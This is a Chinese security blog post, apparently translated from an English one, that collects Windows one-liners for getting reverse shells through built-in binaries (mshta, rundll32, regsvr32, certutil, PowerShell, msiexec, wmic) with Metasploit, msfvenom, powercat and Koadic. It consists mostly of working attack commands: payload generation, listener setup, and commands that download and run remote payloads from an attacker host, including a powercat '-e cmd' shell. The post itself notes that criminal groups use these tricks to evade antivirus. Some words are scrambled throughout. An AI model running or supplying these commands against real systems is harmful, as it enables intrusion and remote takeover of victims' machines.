首页safe6安全windows下shell (windows下数据采集安装)

windows下shell (windows下数据采集安装)

🏷️ safe6安全 ✍️ 这个人很懒,什么都没留下。 📅 2020-02-17 08:09:30

前言

日常整理,当作笔记方便查阅。这一整篇文章的来源主要是看到了一位老外发的Get Reverse-shell via Windows one-liner文章而来,所幸就将他的作为上篇,待我整理后在把下篇发出来。

这种方法也被很多黑产和APT组织用来白加黑免杀,简直就是屡试不爽。最后本人也是菜鸡一只,就当作学习而写,如有不对的地方,望指出。

概述

一般来说,我们经常利用HTTP服务或者其他服务RCE漏洞获得反向shell。而这篇文章主要讨论windows 单行命令执行Powershell或者rundll32恶意指令获得windows系统反向shell。我们准备了windows命令行列表,能使你获得目标计算机的反向shell。

内容列表

Mshta*ex.e**

  • 通过Metasploit的HTA Web服务器发起HTA攻击

Rundll32*ex.e**

  • 通过Metasploit的SMB交付发起Rundll32攻击

Regsvr32*ex.e**

  • 通过Metasploit的脚本Web交付启动Regsvr32

Certutil*ex.e**

  • 通过Msfvenom C#shellcode启动MSbuild攻击

Powershell*ex.e**

  • 通过Powershell启动Powercat攻击
  • 通过Powershell启动cscript*ex.e**
  • 通过Powershell启动批处理文件攻击

Msiexec*ex.e**

  • 通过msfvenom发起msiexec攻击

Wmic*ex.e**

  • 通过Koadic发起Wmic*ex.e**攻击

Mshta*ex.e**

Mshta*ex.e**运行微软HTML应用程序主机,微软HTML应用程序主机是Windows应用用程序,负责运行HTA(HTML应用程序)文件。我们通运行HTML文件执行JavaScript和VBScript脚本。Mshta*ex.e**可以解释这种文件。

Metasploit 包含生成恶意HTA文件的“HTA WebServer”模块,恶意文件通过Powershell运行有效负载。当用户导航到HTA文件时,将在执行有效负载之前由IE两次提示它们。

use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) >set srvhost 192.168.1.109
msf exploit(windows/misc/hta_server) >set lhost 192.168.1.109
msf exploit(windows/misc/hta_server) >exploit

现在可以在受害者机器上执行mshta*ex.e**恶意代码获得meterpreter会话

windows下数据采集安装,windows白名单脚本

在受害者机器上通过mshta*ex.e**访问恶意hta远程文件,你就可以在本机获得shell。

mshta*ex.e** http://192.168.1.109:8080/5EEiDSd70ET0k.hta

windows下数据采集安装,windows白名单脚本

获得受害主机shell:

windows下数据采集安装,windows白名单脚本

Rundll*ex.e**

Rundll32*ex.e**与Windows操作系统相关联,Rundll32*ex.e**可调用从DLL导出的函数(16位或32位)并将其存储在特定的内存库中。

通过SMB交付Metasploit发起Rundll32攻击

Metasploit包含“ SMB Delivery”模块,该模块生成恶意的dll文件。 该模块通过SMB服务器提供有效负载,并提供控制命令。 当前支持DLL和Powershell。

use exploit/windows/smb/smb_delivery
msf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.109
msf exploit(windows/smb/smb_delivery) > exploit

下面通过Rundll32*ex.e**命令获得meterpreter会话。

windows下数据采集安装,windows白名单脚本

在受控机器上远程执行恶意dll,你将获得受控计算机的反向shell。

rundll32*ex.e** \\192.168.1.109\vabFG\test.dll,0

windows下数据采集安装,windows白名单脚本

获得meterpreter会话如下:

windows下数据采集安装,windows白名单脚本

Regsvr32*ex.e**

Regsvr32*ex.e**是一个命令行程序,用于注册和注销OLE控件,例如Windows注册表中的DLL和ActiveX控件。Regsvr32*ex.e**安装在Windows XP和Windows更高版本的%systemroot%\ System32文件夹下。

RegSvr32*ex.e**具有以下命令行选项:
语法:Regsvr32 [/ s] [/ u] [/ n] [/ i [:cmdline]]<dllname>
             / u –注销服务器
             / i –调用DllInstall,并为其传递可选的[cmdline];     与/ u一起使用时,它将调用dll进行卸载
            / n –不调用DllRegisterServer;此选项必须与/ i一起使用/ s –静音;不显示消息框

通过Metasploit的脚本Web交付启动Regsvr32

此模块可快速启动提供有效负载的Web服务器。提供的命令将允许有效负载*载下**并执行。它将通过regsvr32*ex.e**来指定脚本语言解释器或“ squibledoo”来绕过应用程序白名单。该模块的主要目的是在目标计算机上快速建立会话。

Regsvr32使用squiblydoo技术绕过应用程序白名单。签名的Microsoft二进制文件Regsvr32能够运行.sct文件,然后在其中执行包含PowerShell命令。两个Web请求(即.sct文件和PowerShell*载下**/执行)都可以在同一端口上执行。“PSH(Binary)”会将文件写入到硬盘中,允许自定义二进制文件被*载下**和执行。

use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set target 3
msf exploit (web_delivery)> set payloadphp/meterpreter/reverse_tcp
msf exploit (web_delivery)> set lhost192.168.1.109
msf exploit (web_delivery)>set srvhost192.168.1.109
msf exploit (web_delivery)>exploit

复制下图中突出被框选的代码:

windows下数据采集安装,windows白名单脚本

一旦该exploit被执行,您将拥有一个为您创建的URL。在受害者pc的命令提示符中运行该URL,如下所示:

一旦该exploit被执行,您将拥有一个为您创建的URL。在受害者pc的命令提示符中运行该URL,如下所示:

windows下数据采集安装,windows白名单脚本

在命令执行后按Enter键,您将拥有您的会话。如下图所示,输入sysinfo命令获取主机信息:

windows下数据采集安装,windows白名单脚本

Certutil*ex.e**

Certutil*ex.e**是作为证书服务的一部分安装的命令行程序。 我们可以使用此工具在目标计算机上执行恶意EXE文件,并获取meterpreter会话。

通过Msfvenom 发起certutil攻击

通过msfvenom 生成恶意可执行文件,并使用start multi/handler 获取目标计算机反向shell会话。

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f exe > shell*ex.e**

再用python生成一个简易的http服务器

windows下数据采集安装,windows白名单脚本

现在,为了使用certutil*ex.e**能够获取配置信息和可执行文件,我们需要使用如下语法:

语法:[-f] [-urlcache] [-split]可执行文件路径

certutil*ex.e** -urlcache -split -f http://192.168.1.109/shell*ex.e** shell*ex.e** & shell*ex.e**

windows下数据采集安装,windows白名单脚本

use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit

这样,我们获得了目标计算机的反向shell。如下所示:

windows下数据采集安装,windows白名单脚本

Powershell*ex.e**

您可以使用PowerShell*ex.e**从另一个工具(例如Cmd*ex.e**)的命令行启动PowerShell会话,也可以在PowerShell命令行启动新会话。从此处阅读Microsoft Windows官方网站上的更多信息。

通过Powershell启动Powercat攻击

PowerCat是一个的powershell写的TCP / IP瑞士*刀军**,看一看成NCAT的的powershell的实现,然后里面也加入了众多好用的功能,如文件上传,SMB协议支持,中继模式,生成有效载荷,端口扫描等等。

在本地计算机中*载下** PowerShell,然后*载下** Powercat.ps1,使用 python HTTP 服务器传输文件,以获取目标的反向外壳,如下所示,然后启动 netcat *听器侦**。

git clone https://github.com/besimorhino/powercat.git
python -m SimpleHTTPServer 80

windows下数据采集安装,windows白名单脚本

然后在远程端执行下面的命令获得netcat会话。

powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.1.109/powercat.ps1');powercat -c 192.168.1.109 -p 1234 -e cmd"

windows下数据采集安装,windows白名单脚本

正如你观察到的,我们已经获得了目标机器的netcat会话。

windows下数据采集安装,windows白名单脚本

批处理文件攻击

同样,PowerShell 允许客户端执行批处理文件,因此让我们使用 msfvenom 生成恶意批处理文件,如下所示,然后启动 netcat *听器侦**。

msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.109 lport=4444 > 1.bat

windows下数据采集安装,windows白名单脚本

然后执行以下命令以获取 netcat 会话。

powershell -c "IEX((New-Object System.Net.WebClient).DownloadString('http://192.168.1.109/1.bat'))

windows下数据采集安装,windows白名单脚本

如下,我们已经获得了目标机器的netcat会话。

windows下数据采集安装,windows白名单脚本

利用cscript*ex.e**

同样,PowerShell 允许客户端执行cscript*ex.e** 运行 wsf、js 和vbscript文件。因此,让我们生成具有 msfvenom 的恶意bat文件,如下所示,并作为*听器侦**启动multi/handler程序。

msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.109 lport=1234 -f vbs >1.vbs

windows下数据采集安装,windows白名单脚本

在目标机器上执行下面的命令行获得meterpreter会话。

powershell*ex.e** -c "(New-Object System.NET.WebClient).DownloadFile('http://192.168.1.109/1.vbs',\"$env:temp\test.vbs\");Start-Process %windir%\system32\cscript*ex.e** \"$env:temp\test.vbs\""

windows下数据采集安装,windows白名单脚本

use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit

获得meterpreter会话如下:

windows下数据采集安装,windows白名单脚本

Msiexec*ex.e**

Windows 操作系统附带了一个 Windows 安装程序引擎,该引擎由 MSI 程序包用于应用程序的安装。解释包和安装产品的可执行程序就是 Msiexec*ex.e**。

通过msfvenom发起msiexec攻击

让我们利用MeterpreterWindows攻击载荷生成 MSI 包文件(1.msi)如下所示,并作为*听器侦**启动multi/handler程序进行监听。

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109lport=1234 -f msi > 1.msi

windows下数据采集安装,windows白名单脚本

在msiexec 的帮助下,一旦您在远程计算机上执行 1.msi 文件,你会得到反向连接在您的本地计算机(Kali Linux).

msiexec /q /i http://192.168.1.109/1.msi

windows下数据采集安装,windows白名单脚本

use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit

获得meterpreter会话如下:

windows下数据采集安装,windows白名单脚本

Wmic*ex.e**

WMIC *ex.e**是一个 Microsoft 工具,它提供了一个 WMI命令行界面,用于本地和远程计算机的各种管理功能,还用于在本地或远程执行系统设置、停止进程和执行脚本等查询。因此,它可以调用 XSL 脚本(可增强样式表语言)。

通过Koadic发起Wmic*ex.e**攻击

koadic是一个命令控制(C2)工具,类似Metasploit和Powershell Empire。使用koadic我们生成恶意XSL文件。koadic安装完成后,您可以运行./koadic 文件以启动 koadic,然后通过运行以下命令开始加载stager/js/wmic 程序,并将 SRVHOST 设置为程序回连IP。

use stager/js/wmic
set SRVHOST 192.168.1.107
run

windows下数据采集安装,windows白名单脚本

执行 WMIC 以下命令,从远程服务器*载下**和运行恶意 XSL 文件:

wmic os get /FORMAT:"http://192.168.1.107:9996/g8gkv.xsl"

windows下数据采集安装,windows白名单脚本

一旦恶意的XSL文件在目标计算机上执行,你将有一个僵尸连接,就像Metasploit回连的情况一样。

windows下数据采集安装,windows白名单脚本